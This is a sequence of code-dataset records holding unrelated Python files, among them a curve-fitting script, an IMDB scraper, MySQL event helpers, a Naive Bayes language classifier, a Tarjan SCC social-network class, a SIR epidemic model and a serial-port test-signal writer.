Minimizer(resid, params, fcn_args=(tmp[:,1], tmp[:,2]))\n\t\t\t\t\t\t\t\n\t\t\t\t\t#Perform the minimization\n\t\t\t\t\tfit_Mod = minner.minimize(method = 'leastsq')\n\t\t\t\t\tif fit_Mod.aic < best_score :\n\t\t\t\t\t\tbest_mod = fit_Mod\n\t\t\t\t\t\tbest_score = fit_Mod.aic\n\t\t\t\t\t\tScores[j] = fit_Mod.aic\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t\n\t\t\tF = variance(best_mod.residual)/variance(tmp[:,2])\n\t\t\talpha = 0.05\n\t\t\tp_value = scipy.stats.f.cdf(F, len(tmp)-1, len(tmp)-1)\n\t\t\tif p_value > alpha:\n\t\t\t\tprint(\"ID \", ID, \" Not significant\")\n\t\t\t\treturn escaping\n\t\t\t\n\t\tif i == 'Briere':\n\t\t\tcolour = Colour[1]\n\t\t\tresid = residuals_Briere\n\t\t\tparams = Starting_vals_Briere(tmp)\n\t\t\tj = 2\n\t\t\t\n\t\t\t#create minimzer object\n\t\t\tminner = Minimizer(resid, params, fcn_args=(tmp[:,1], tmp[:,2]))\n\t\t\t\t\t\t\n\t\t\t#Perform the minimization\n\t\t\tfit_Mod = minner.minimize(method = 'leastsq')\n\t\t\tbest_mod = fit_Mod\n\t\t\tbest_score = fit_Mod.aic\n\t\t\tScores[j] = fit_Mod.aic\n\t\t\t\n\t\t\tfor l in range(10):\n\t\t\t\ttry:\n\t\t\t\t\t\n\t\t\t\t\tparams = Starting_vals_Briere(tmp, Ran = True)\n\t\t\t\t\t#create minimzer object\n\t\t\t\t\tminner = Minimizer(resid, params, fcn_args=(tmp[:,1], tmp[:,2]))\n\t\t\t\t\t\t\t\n\t\t\t\t\t#Perform the minimization\n\t\t\t\t\tfit_Mod = minner.minimize(method = 'leastsq')\n\t\t\t\t\tif fit_Mod.aic < best_score :\n\t\t\t\t\t\tbest_mod = fit_Mod\n\t\t\t\t\t\tbest_score = fit_Mod.aic\n\t\t\t\t\t\tScores[j] = fit_Mod.aic\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\tF = variance(best_mod.residual)/variance(tmp[:,2])\n\t\t\talpha = 0.05\n\t\t\tp_value = scipy.stats.f.cdf(F, len(tmp)-1, len(tmp)-1)\n\t\t\tif p_value > alpha:\n\t\t\t\tprint(\"ID \", ID, \" Not significant\")\n\t\t\t\treturn escaping\n\n\t\tif plot == 'Plot': # Plot this model type\n\t\t\tprint(i)\n\t\t\tprint(report_fit(best_mod))\n\t\t\tresult = tmp[:,2] + best_mod.residual\n\t\t\tt_vec = np.linspace(minT,maxT,1000)\n\t\t\tN_vec = np.ones(len(t_vec))\n\t\t\tresidual_smooth = resid(best_mod.params, t_vec, N_vec)\n\t\t\tpredictedVal = residual_smooth + N_vec\n\t\t\tp.plot(t_vec, (predictedVal - shifty), colour, linestyle = '--', linewidth = 1)\n\tMiNScore = min(Scores[1:4])\n\tScores[1] = np.exp((MiNScore-Scores[1])/2)\n\tScores[2] = np.exp((MiNScore-Scores[2])/2)\n\tScores[3] = np.exp((MiNScore-Scores[3])/2)\n\tScores[0] = ID\n\tScores[4] = maxT - minT\n\tScores[5] = (maxT - minT)/len(tmp)\n\n\tif plot == 'Plot': \n\t\tp.plot(tmp[:,1], (tmp[:,2] - shifty), 'b+')\n\t\tp.legend(fontsize = 10, labels = ['Schoolfield', 'Briere', 'Quadratic', 'Data'])\n\t\tp.xlabel('Temperature (K)', fontsize = 10)\n\t\tp.ylabel('Original Trait Valaue', fontsize = 10)\n\t\tp.ticklabel_format(style='scientific', scilimits=[0,3])\n\t\tp.title('ID :' + str(ID))\n\t\tp.savefig('../Results/plot110.pdf')\n\t\tp.close()\n\treturn(Scores)\n\ndef main(argv):\n\t\"\"\" Build Linear model and prints parameter estimates and AIC \"\"\"\n\t#prep\n\tfields = ['ID', 'ConTemp', 'OriginalTraitValue', 'ConTempMethod']\n\tNum = int(argv[2])\n\t\n\t#read in data\n\tTempRespd = pd.read_csv(argv[1], usecols = fields, dtype={'ID': int, 'ConTemp': float, 'OriginalTraitValue': float, 'ConTempMethod': str}) \n\t\n\tTempResp = TempRespd.drop(columns=['ConTempMethod'])\n\tTempResp = np.array(TempResp, dtype = float)\n\tTempResp[:,[1, 2]] = TempResp[:,[2, 1]]\n\n\t# Option Plot: Best fit for ID given by argv[2]\n\tif argv[3] == 'Plot':\n\t\tLin_Mod(TempResp, Num, argv[3])\n\n\t# Option Stats: Record best AICs for each ID up to ID given by argv[2]\n\tif argv[3] == 'Stats':\n\t\tparas = np.zeros((Num-1, 6))\n\t\tprint('Schoolfield', 'Briere', 'Quadratic', end = '\\n')\n\t\tHabitats = []\n\t\tfor i in range(1, Num):\n\t\t\t# For each ID attempt to fit every model, if this fails move on to next ID\n\t\t\ttry:\n\t\t\t\ttmp = TempRespd.ConTempMethod[TempRespd.ID == i]\n\t\t\t\tHabitats.append(np.unique(tmp)[0])\n\t\t\t\tparas[i-1,:] = Lin_Mod(TempResp, i, argv[3])\n\t\t\t\tif max(paras[i-1, 1:4]) == 1:\n\t\t\t\t\tprint('ID: ', i, ' ', Habitats[i-1], ' ', 'Schoolfield AIC: ', paras[i-1,1], 'Briere AIC: ', paras[i-1,2], 'Quadratic AIC: ', paras[i-1,3], end=\"\\n\")\n\n\t\t\texcept:\n\t\t\t\tpass\n\t\tParas = pd.DataFrame(paras, columns = ['ID', 'Schoolfield', 'Briere', 'Quadratic', 'Range', 'Density'])\n\t\tConTempMethod = pd.Series(Habitats)\n\t\tParas['ConTempMethod'] = ConTempMethod.values\n\t\tParas.to_csv('../Results/res.csv')\n\t\tprint('\\n')\n\nif __name__ == \"__main__\": \n\t\"\"\"Makes sure the \"main\" function is called from command line\"\"\" \n\tstatus = main(sys.argv)\n\tsys.exit(status)","repo_name":"TJCanterbury/CMEECourseWork","sub_path":"CMEEMiniProject/Sandbox/npMod.py","file_name":"npMod.py","file_ext":"py","file_size_in_byte":9853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16879625543","text":"from django.shortcuts import render\nfrom django.views.generic import View\nfrom django.shortcuts import render\n#import urllib\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\n# Create your views here.\n\nclass IMDBRating(View):\n\n\tdef get(self,request):\n\t\t\n\n\t\timdb_top_250_url = 'https://www.imdb.com/chart/top/?ref_=nv_mv_250'\n\n\t\t#myURL = urlopen(imdb_top_250_url)\n\t\tr = urlopen(imdb_top_250_url).read()\n\t\tsoup = BeautifulSoup(r,\"html.parser\")\n\t\t#print(myURL.read())\n\t\ttop_250_object = soup.find_all(\"tr\")\n\t\ttop_250_movies_list = []\n\t\tfor row in top_250_object:\n\t\t\t\n\t\t\tif row.find_all('td') :\n\t\t\t\tmovie_name = row.find_all('a')[1].text.encode('utf-8').decode(\"utf-8\") \n\t\t\t\t\n\t\t\t\ttext = row.find_all('strong')[0].get('title', 'No title attribute')\n\t\t\t\ttext = text.replace(' based on ','-',).replace(' user ratings','').split('-')\n\t\t\t\trating = float(text[0])\n\t\t\t\tusers = float(text[1].replace(',',''))\n\t\t\t\ttop_250_movies_list.append([str(movie_name),rating,users])\n\t\treturn render(request,'scatter_plot.html',locals())","repo_name":"sanjay-regulla/Gramener","sub_path":"ScatterPlot/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11488389527","text":"import pymysql\nfrom config import Config\n\nconfig = Config()\n\nconn = pymysql.connect(host=config.DB_HOST, user=config.DB_USER, password=config.DB_PASSWORD, db=config.DB_NAME,\n cursorclass=pymysql.cursors.DictCursor)\n\ncur = conn.cursor()\n\n\ndef add_event(userId, communityId, title, date, eventDesc, regURL, eventType, image_path):\n sql = \"INSERT INTO event (userId, communityId, title, edate, eventDesc, regURL, eventType, imgURL) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\n conn.ping(reconnect=True)\n cur.execute(sql,(userId, communityId, title, date, eventDesc, regURL, eventType, image_path))\n conn.commit()\n conn.cursor()\n conn.close()\n\n\ndef exist_event(title):\n sql = \"SELECT * FROM event WHERE title = %s\"\n conn.ping(reconnect=True)\n cur.execute(sql,(str(title)))\n result = cur.fetchall()\n conn.commit()\n if (len(result) == 0):\n return False\n else:\n return True\n\n\ndef get_eventList_in_community(community_id):\n sql = \"SELECT * FROM event WHERE communityId = %s \"\n conn.ping(reconnect=True)\n cur.execute(sql,(str(community_id)))\n result = cur.fetchall()\n conn.commit()\n if result:\n return result\n else:\n return []\n\n\ndef get_event_by_id(event_id):\n sql = \"SELECT * from event where id = %s\"\n conn.ping(reconnect=True)\n cur.execute(sql, str(event_id))\n result = cur.fetchone()\n conn.commit()\n if result:\n return result\n else:\n return None\n\n\ndef add_interestedNum(event_id):\n sql = \"UPDATE event SET interestedNum = interestedNum + 1 WHERE id = %s\"\n conn.ping(reconnect=True)\n cur.execute(sql,(str(event_id)))\n conn.commit()\n conn.cursor()\n conn.close()\n\n\ndef delete_interestedNum(event_id):\n sql = \"UPDATE event SET interestedNum = interestedNum - 1 WHERE id = %s\"\n conn.ping(reconnect=True)\n cur.execute(sql,(str(event_id)))\n conn.commit()\n conn.cursor()\n conn.close()","repo_name":"babylink1/CS555","sub_path":"model/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36179167800","text":"from display import DisplayBoard, welcome\n\nfrom input import Interact, PlayGame\n\ninter = Interact()\ndb = DisplayBoard()\nwelcome()\ninter.player_count()\npg = PlayGame(inter)\n\n\nwhile inter.playing:\n db.print_board(db.position)\n if inter.playing:\n inter.get_input()\n pg.game_over(inter)\n if not inter.playing:\n db.print_board(db.position)\n break\n","repo_name":"FujikoTide/tic-tac-toe","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42740483921","text":"import csv\nimport re\nimport math\nimport sys\nimport operator\nimport string\nfrom random import shuffle\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom collections import Counter\nfrom time import time\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.metrics.pairwise import euclidean_distances\n\n# Load data\ndf_x = pd.read_csv('train_set_x.csv', index_col='Id').values\ndf_y = pd.read_csv('train_set_y.csv', index_col='Id').values\nvalid = pd.read_csv('test_set_x.csv', index_col='Id').values\n\n# Process\ndf_x[pd.isnull(df_x)] = '' #potentially uses tab chars instead\nvalid[pd.isnull(valid)] = ''\ndf = np.concatenate((df_x,df_y), axis=1)\n\nfor i,s in enumerate(df_x):\n df_x[i][0] = re.sub(r'http\\S*', '' ,s[0] , re.UNICODE)\n df_x[i][0] = re.sub(r'[0-9]', '' ,s[0] , re.UNICODE)\n \n# Data Splitting\nx_train, x_test, y_train, y_test = train_test_split(df_x, df_y, test_size=0.2, random_state=14)\nx_test_gen = [[] for i in range(len(x_test))]\nfor i, test_samples in enumerate(x_test):\n sequence = list(re.sub(r'\\s', '', test_samples[0]))\n #shuffle(sequence)\n if len(sequence) > 20:\n sequence = sequence[:20]\n sequence = ''.join(sequence)\n x_test_gen[i] = sequence\nx_test_gen = np.array(x_test_gen)\n\nx_train_gen = [[] for i in range(len(x_train))]\nfor i, test_samples in enumerate(x_train):\n sequence = list(re.sub(r'\\s', '', test_samples[0]))\n shuffle(sequence)\n sequence = ''.join(sequence)\n x_train_gen[i] = sequence\n \n# Naive Bayes - Multinomial\npipeline_nb_m = Pipeline([\n ('vect', CountVectorizer(analyzer='char', lowercase=False)),\n ('clf', MultinomialNB()),\n])\nparameters_nb_m = {\n 'vect__max_features': (1000, None)\n}\nt_nb_m = time()\ngs_nb = GridSearchCV(pipeline_nb_m,parameters_nb_m, n_jobs=-1)\ngs_nb = gs_nb.fit(x_train_gen,y_train.flatten().tolist())\nprint ('Done %03f' % (time() - t_nb_m))\npred_nb = gs_nb.predict(x_test_gen.flatten().tolist())\nprint ('Naive Bayes %02.02f%%' % (np.mean(pred_nb == y_test.flatten().tolist())*100))\nfor param_name in sorted(parameters_nb_m.keys()):\n print ('%s: %r' % (param_name, gs_nb.best_params_[param_name]))\n \n# Saving predictions to an output file for submission to the competition\nfilename = 'io0-predictions-nb.csv'\npredictions = gs_nb.predict(valid.flatten().tolist())\nwith open(filename,'w') as out:\n out.write('Id,Category\\n')\n for i, e in enumerate(predictions):\n out.write(str(i))\n out.write(',')\n out.write(str(e))\n out.write('\\n')","repo_name":"io0/LanguageClassifier","sub_path":"NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74872247608","text":"import os\nimport random\nfrom ast import literal_eval\n\nimport numpy as np\nimport pandas as pd\nimport torch as torch\nfrom sklearn_som.som import SOM\n\nfrom gas.settings import PATH_CLIP, PATH_NOUNLIST, PATH_CLASSES, PATH_SELECTION, PATH_ENDS, IMAGES_ON_LINE, \\\n LINES, NUMBER_OF_SEARCHED\n\n\nclass LoaderDatabase:\n \"\"\"\n LoaderDatabase loads the data from a given database.\n\n Attributes:\n path_data (str): The path to the database.\n is_sea_database (bool): A boolean representing whether the database is a sea database or not.\n path_clip (str): The path to folder with preprocessed CLIP data.\n path_nounlist (str): The path to the nounlist.\n path_classes (str): The path to the file with classification of images.\n path_selection (str): The path to the file with indexes of images which should be used for searching.\n path_ends (str): The path to the file with indexes of images which represents ends of each video.\n \"\"\"\n\n def __init__(self, path_data, is_sea_database=False):\n \"\"\"\n Args:\n path_data (str): The path to the database.\n is_sea_database (bool): A boolean representing whether the database is a sea database or not.\n \"\"\"\n self.path_clip = path_data + (\"sea_clip\" if is_sea_database else PATH_CLIP)\n self.path_nounlist = path_data + (\"sea_nounlist.txt\" if is_sea_database else PATH_NOUNLIST)\n self.path_classes = path_data + (\"sea_result.csv\" if is_sea_database else PATH_CLASSES)\n self.path_selection = path_data + (\"sea_selection.txt\" if is_sea_database else PATH_SELECTION)\n self.path_ends = path_data + (\"sea_videos.txt\" if is_sea_database else PATH_ENDS)\n self.is_sea_database = is_sea_database\n self.path_data = path_data\n\n def get_clip_data(self):\n \"\"\"\n Loads the preprocessed data from CLIP.\n\n Returns:\n list: A list of preprocessed data from CLIP.\n\n \"\"\"\n print('loading data...')\n clip_data = []\n\n # preprocessed data from clip\n for fn in sorted(os.listdir(self.path_clip)):\n clip_data.append(torch.load(self.path_clip + f\"/{fn}\"))\n return clip_data\n\n def get_photos_classes(self):\n \"\"\"\n Loads the photo classes.\n\n Returns:\n dict: A dictionary where keys are integers representing image indexes\n and values are lists of indexes representing classes.\n\n \"\"\"\n class_data = pd.read_csv(self.path_classes, sep=';').set_index('id').to_dict()['top']\n return {int(key) - 1: literal_eval(value) for key, value in class_data.items()}\n\n def get_classes(self):\n \"\"\"\n Loads classes (names) and class probabilities.\n\n Returns:\n tuple: A tuple containing two lists. The first list contains class names\n and the second list contains the probability of each class.\n\n \"\"\"\n classes = []\n class_pr = {}\n with open(self.path_nounlist, 'r') as f:\n for line in f:\n split = line.split(\":\")\n classes.append(split[0][:-1])\n class_pr[len(classes) - 1] = float(split[1][:-1])\n\n return classes, class_pr\n\n def get_context(self, size_dataset, sur):\n \"\"\"\n Load context of each image from dataset.\n\n Args:\n size_dataset (int): The total number of images in the dataset.\n sur (int): The radius of the context window.\n\n Returns:\n dict: A dictionary where the key is the integer representation of each image\n and the value is a list of integer representation of image within a given radius.\n \"\"\"\n same_video = {}\n if self.path_ends:\n bottom = 0\n with open(self.path_ends, 'r') as f:\n for line in f:\n top = int(line[:-1]) - 1\n same_video.update(\n {i: [max(bottom, i - sur), min(top, i + sur)] for i in range(bottom, top)})\n bottom = top\n else:\n for i in range(size_dataset):\n same_video[i] = [i, i]\n\n return same_video\n\n def set_finding(self, size_dataset):\n \"\"\"\n Generate indexes of images that should be found.\n\n Args:\n size_dataset (int): The total number of images in the dataset.\n\n Returns:\n list: A list of indexes of images that should be found.\n \"\"\"\n # images that should be found\n if self.is_sea_database:\n with open(self.path_selection, 'r') as file:\n sea_finding = [int(num) for num in file.readline().split(',')]\n random.shuffle(sea_finding)\n\n targets = sea_finding[:20] if self.is_sea_database else []\n for i in range(NUMBER_OF_SEARCHED):\n new_int = random.randint(1, size_dataset)\n if new_int not in targets:\n targets.append(new_int)\n\n return targets\n\n @staticmethod\n def load_first_screen(class_data, size_dataset, targets):\n \"\"\"\n Generate the initial set of images indexes using SOM of class labels.\n\n Args:\n class_data (dict): A dictionary containing the class labels for each image. (used by SOM)\n size_dataset (int): The size of the dataset.\n targets (list): A list of indexes of images that should be found.\n\n Returns:\n list: A list of indexes of images representing the first window.\n \"\"\"\n # get first window - SOM of labels\n first_show = [0 for _ in range(IMAGES_ON_LINE * LINES)]\n input_data = np.array(list(class_data.values()))\n som = SOM(m=LINES, n=IMAGES_ON_LINE, dim=len(input_data[0]))\n\n prediction = som.fit_predict(input_data)\n\n for i in range(len(first_show)):\n if i in prediction:\n first_show[i] = np.random.choice(np.where(prediction == i)[0])\n else:\n first_show[i] = -1\n\n for i in range(len(first_show)):\n if first_show[i] == -1 and len((set(first_show) & set(targets)) - {-1}) < size_dataset:\n next_id = random.randint(1, size_dataset - 1)\n while next_id in first_show:\n next_id = random.randint(1, size_dataset - 1)\n first_show[i] = next_id\n\n return first_show\n","repo_name":"zuzavop/image-searcher","sub_path":"gasearcher/gas/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29331619519","text":"#Aprobación de créditos\ningreso = int(input(\" Introduzca su ingreso en pesos : \"))\nnacimiento = int(input(\" introduzca su año de nacimiento :\"))\nhijos = int(input(\" Introduzco la cantidad de hijos que tiene :\"))\nañosbanco = int(input(\" Introduzca la cantidad de años que pertenece al banco :\"))\nestado_c = input(\" Introduzca su estado civil (S/C) :\")\nvivienda = input(\" Introduzca si vive en campo o ciudad (U/R) :\")\n\n\nif (añosbanco >= 10 and hijos >= 2):\n print(\"APROBADO\")\nelif (estado_c == \"c\" or estado_c == \"C\" and hijos > 3 and nacimiento >= 1975 and nacimiento <= 1965) :\n print(\"APROBADO\")\nelif (ingreso >= 2500000 and estado_c == \"s\" and vivienda == u):\n print(\"APROBADO\")\nelif (ingreso >= 3500000 and añosbanco > 5):\n print(\"APROBADO\")\nelif (vivienda == \"r\" or vivienda == \"R\" and estado_c == \"C\" or estado_c == \"c\" and hijos < 2):\n print(\"APROBADO\")\nelse :\n print(\"NO APROBADO\")\n\n\n\n\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej3/hito1_ej3_d65634b492ff94d592e0c17a73bf4592.py","file_name":"hito1_ej3_d65634b492ff94d592e0c17a73bf4592.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13775424719","text":"\"\"\"\nAuthors: Riley Campbell, Lane Moseley\nClass: CSC-372 Analysis of Algorithms, Fall 2020\nDescription: Strongly Connected Components for Social Networks\n\"\"\"\nfrom collections import deque\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n\nclass Vertex:\n \"\"\"\n Graph vertex.\n \"\"\"\n\n def __init__(self, value, neighbors=None):\n \"\"\"\n Initialize the vertex with a value and a set of neighbors.\n\n Args:\n value:\n neighbors:\n \"\"\"\n # neighbors=[] is mutable, avoid that\n if neighbors is None:\n neighbors = []\n\n self.index = -1\n self.lowlink = -1\n self.on_stack = False\n\n self.neighbors = neighbors\n self.value = value\n\n\ndef buildEdges(friends, G):\n for key, values in friends.items():\n for value in values:\n G.add_edge(key, value)\n\n\ndef printSCC(dictionary, scc):\n G = nx.DiGraph()\n # filter out anything not in the scc\n if len(scc) > 1:\n for name in list(dictionary):\n if name not in scc:\n del dictionary[name]\n else:\n dictionary[name] = [x for x in dictionary[name] if x in scc]\n\n buildEdges(dictionary, G)\n else:\n G.add_node(scc[0])\n # print graph\n plt.figure()\n nx.draw_networkx(G, with_labels=True, node_color='green')\n plt.show()\n\n\nclass SocialNetwork:\n \"\"\"\n Social network graph. The graph is presumed to be un-directed.\n \"\"\"\n\n def __init__(self, dictionary):\n \"\"\"\n Initialize the graph with a set of vertices.\n\n Args:\n dictionary: { vertex: [neighbors] }\n \"\"\"\n self.__index = 0 # global index for SCC\n self.__path = [] # list to track dfs path\n self.__S = deque() # stack for SCC\n\n # build a list of vertices and edges\n self.__vertices = [Vertex(key, value) for key, value in dictionary.items()]\n self.__edges = self.__edge_list()\n self.__origDict = dictionary\n self.__global_components = []\n\n def __edge_list(self):\n \"\"\"Build an edge list from a list of Vertices.\n\n Returns:\n edges: [(v, w)] where v, w are Vertex instances\n \"\"\"\n edges = []\n\n for v in self.__vertices:\n for w_value in v.neighbors:\n # w is just a value, find the associated Vertex instance\n w_vertex = next(vertex for vertex in self.__vertices if vertex.value == w_value)\n edges.append((v, w_vertex))\n\n return edges\n\n def connected_components(self, show_plot=True):\n # Pseudocode from\n # https://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm#The_algorithm_in_pseudocode\n\n self.__global_components = []\n\n # input is self.__vertices\n self.__S = deque() # create an empty stack\n self.__index = 0 # index starts at zero\n for v in self.__vertices:\n if v.index == -1:\n self.connected_components_helper(v, show_plot)\n\n return self.__global_components\n\n def connected_components_helper(self, vertex, show_plot=True):\n # Pseudocode from\n # https://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm#The_algorithm_in_pseudocode\n\n vertex.index = self.__index\n vertex.lowlink = self.__index\n self.__index += 1\n vertex.on_stack = True\n self.__S.append(vertex)\n\n for _, w in self.__edges:\n if w.index == -1:\n self.connected_components_helper(w, show_plot)\n vertex.lowlink = min(vertex.lowlink, w.lowlink)\n elif w.on_stack is True:\n vertex.lowlink = min(vertex.lowlink, w.index)\n\n if vertex.lowlink == vertex.index:\n component = []\n\n w = self.__S.pop()\n w.on_stack = False\n component.append(w.value)\n\n while w != vertex:\n w = self.__S.pop()\n w.on_stack = False\n component.append(w.value)\n\n if show_plot is True:\n # display result of SCC\n printSCC(self.__origDict.copy(), component)\n\n self.__global_components.append(component)\n\n def dfs(self, value):\n \"\"\"\n Perform depth first search. This function is not used for the SCC, but\n was added for reference and as build-up to the SCC functions.\n\n Args:\n value: starting node\n\n Returns:\n [ ]: depth first search traversal\n \"\"\"\n\n # check for empty list\n if value is None:\n return\n\n # reset the path from any prior iteration\n self.__path = []\n\n # given some value, find the vertex with that value\n vertex = next(v for v in self.__vertices if v.value == value)\n\n # start the dfs\n visited = []\n self.dfs_helper(vertex, visited)\n\n return self.__path\n\n def dfs_helper(self, vertex, visited):\n \"\"\"\n Recursive helper function for depth first search. This function is not\n used for the SCC, but was added for reference and as build-up to the\n SCC functions.\n\n Args:\n vertex: current node\n visited: list of visited nodes\n\n Returns:\n None\n \"\"\"\n # add the vertex to the visited list\n visited.append(vertex.value)\n\n # add the vertex to the path\n self.__path.append(vertex.value)\n\n for neighbor in vertex.neighbors:\n if neighbor not in visited:\n # given some neighboring value, find the vertex with that value\n next_vertex = next(v for v in self.__vertices if v.value == neighbor)\n\n # recurse through the neighbors neighbors\n self.dfs_helper(next_vertex, visited)\n\n def getHead(self):\n if len(self.__vertices) > 0:\n return self.__vertices[0].value\n else:\n return None\n","repo_name":"kbikeguy/mycodes","sub_path":"Python/social network/socialnetwork.py","file_name":"socialnetwork.py","file_ext":"py","file_size_in_byte":6015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3538721179","text":"import numpy as np\nfrom scipy.integrate import odeint # For differential calculations\nimport matplotlib.pyplot as plt # For visualization\n\n# Coronavirus Spread Mathematical Model\n\n# In SIR Model we split the total population into three groups.\n# S = Suspectibles (People who could potantically catch the virus)\n# I = Infectives (People currently have the virus and can infect others)\n# R = Recovered / Removed (People who already caught the virus, then either recovered or died, and cannot infect others)\n\n# Lets define initial conditions\n\nN = 1000 # Total population\nmax_time = 15 # Simulation time\n\nSi = N * 0.99 # Normal people\nIi = N - Si # Infected people\nRi = 0\n\n# S + I + R should always be equal to N\n\ntransmission_rate = 4.2\nrecovery_rate = 0.9\nt = np.linspace(0, max_time - 1, max_time * 100) # x-axis\n\n# The SIR model differential equations\ndef model(z, t):\n (S, I, R) = z\n dsdt = -(transmission_rate * S * I) / N\n didt = (transmission_rate * S * I) / N - (recovery_rate * I)\n drdt = (recovery_rate * I)\n return (dsdt, didt, drdt)\n\ninitial_vals = (Si, Ii, Ri) # initial values vector\n\nS, I, R = odeint(model, initial_vals, t).T\n\nfig = plt.figure(1)\nax1 = fig.add_subplot(211)\nax1.plot(t, S, 'b', label='Suspectibles')\nax1.plot(t, I, 'r', label='Infectives')\nax1.plot(t, R, 'g', label='Recovered')\nax1.set_xlabel('Time')\nax1.set_ylabel('Population')\nlegend = ax1.legend()\n\n###\n\ntransmission_rate = 2.2\nrecovery_rate = 0.9\n\n# The SIR model differential equations\n\ninitial_vals = (Si, Ii, Ri) # initial values vector\n\nS, I, R = odeint(model, initial_vals, t).T\n\nax2 = fig.add_subplot(212)\nax2.plot(t, S, 'b', label='Suspectibles')\nax2.plot(t, I, 'r', label='Infectives')\nax2.plot(t, R, 'g', label='Recovered')\nax2.set_xlabel('Time')\nax2.set_ylabel('Population')\nlegend = ax2.legend()\n\nplt.show()","repo_name":"enesdemirag/programming-exercises","sub_path":"exercises/materials/sir-model/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"77"} +{"seq_id":"13748998165","text":"#!/usr/bin/python3\n\n# Prerequsites:\n# -------------\n\n# Installation of operating system tools\n# --------------------------------------\n# check available tty ports\n# sudo apt install usbutils\n# lsusb\n\n# Installation of python packages:\n# --------------------------------\n# sudo apt install python3-pip\n# pip3 install serial\n# pip3 install pyserial\n\nimport sys\nimport time\nimport serial\nimport argparse\n\nimport test_variables as tvars\n\n# terminal command line options\nparser = argparse.ArgumentParser(description=\"write data to test signal generator\")\nparser.add_argument(\"--presentation\", type=int, default=0, help=\"steps in presentation\")\nargs = parser.parse_args()\n\n# check which ttyUSBx port is available\n# tbd ...\n\n\n# configure port parameters\n# if an error occurs, check try /dev/ttyUSB1\nser = serial.Serial(\n port='/dev/ttyUSB0',\\\n baudrate=9600,\\\n parity='N',\\\n stopbits=1,\\\n bytesize=8,\\\n timeout=None)\n\n# print serial port configuration\nprint('Serial Port initialised with the following parameters:')\nprint('-----------------------------------------------------')\nprint(ser)\nprint('\\r')\n\n# define time between serial transfer in seconds\nwait_between_transfer = 0.5\n\nprint('Writing commands:')\nprint()\nprint(\"{:50s} | {}\".format(\"command\", \"(address | data) or pattern sequence hex\"))\nprint(100*\"-\")\n\nif args.presentation == 0: # default without optional argument\n commands = [\"system_control_enable\"]\n #commands = [\"system_control_disable\", \"noise_control_off\", \"pwm_control_off\", \"pattern_control_stop\"]\n #commands = [\"pwm_pulse_width_1\", \"pwm_period_max\",\"pwm_control_on_intern_trig\"]\n #commands = [\"pwm_pulse_width_1\", \"pwm_period_min\",\"pwm_control_on_intern_trig\"]\n #commands = [\"noise_period_max\",\"noise_prbsg_length_7bit\", \"noise_control_on_extern_trig\"]\n #commands = [\"pattern_length_4\", \"pattern_period_max\", \"pattern_control_load\", \"pattern_example_sequence_4\", \"pattern_extern_control_continous_run\"]\n\nelif args.presentation == 1:\n commands = [\"system_control_enable\"]\n\nelif args.presentation == 2:\n commands = [\"pwm_pulse_width_1\", \"pwm_period_max\",\"pwm_control_on_intern_trig\"]\n\nelif args.presentation == 3:\n commands = [\"pwm_pulse_width_255\"]\n\nelif args.presentation == 4:\n commands = [\"noise_period_max\",\"noise_prbsg_length_4bit\", \"noise_control_on_extern_trig\"]\n\nelif args.presentation == 5:\n commands = [\"noise_prbsg_length_7bit\"]\n\nelif args.presentation == 6:\n commands = [\"pattern_length_4\", \"pattern_period_max\", \"pattern_control_load\", \"pattern_example_sequence_4\", \"pattern_extern_control_continous_run\"]\n\n\nfor command in commands:\n print(\"{:50s} | {}\".format(command, tvars.serial_vars[command].hex())) \n ser.write(tvars.serial_vars[command])\n time.sleep(wait_between_transfer)\n\n# end with exit code\nsys.exit(0)\n\n","repo_name":"RuairiDillon1/VLSI-vhdlProject","sub_path":"scripts/write_to_ttyUSBx.py","file_name":"write_to_ttyUSBx.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15257636356","text":"from ad_api.base import Client, sp_endpoint, ApiResponse, Utils\n\n\nclass NegativeKeywordsV3(Client):\n @sp_endpoint('/sp/negativeKeywords/list', method='POST')\n def list_negative_keywords(self, version: int = 3, **kwargs) -> ApiResponse:\n r\"\"\"\n Listing negative product keywords.\n\n Request Body (optional)\n\n Returns\n ApiResponse\n \"\"\"\n json_version = 'application/vnd.spNegativeKeyword.v' + str(version) + \"+json\"\n headers = {\"Accept\": json_version, \"Content-Type\": json_version}\n\n return self._request(kwargs.pop('path'), data=Utils.convert_body(kwargs.pop('body'), False), params=kwargs, 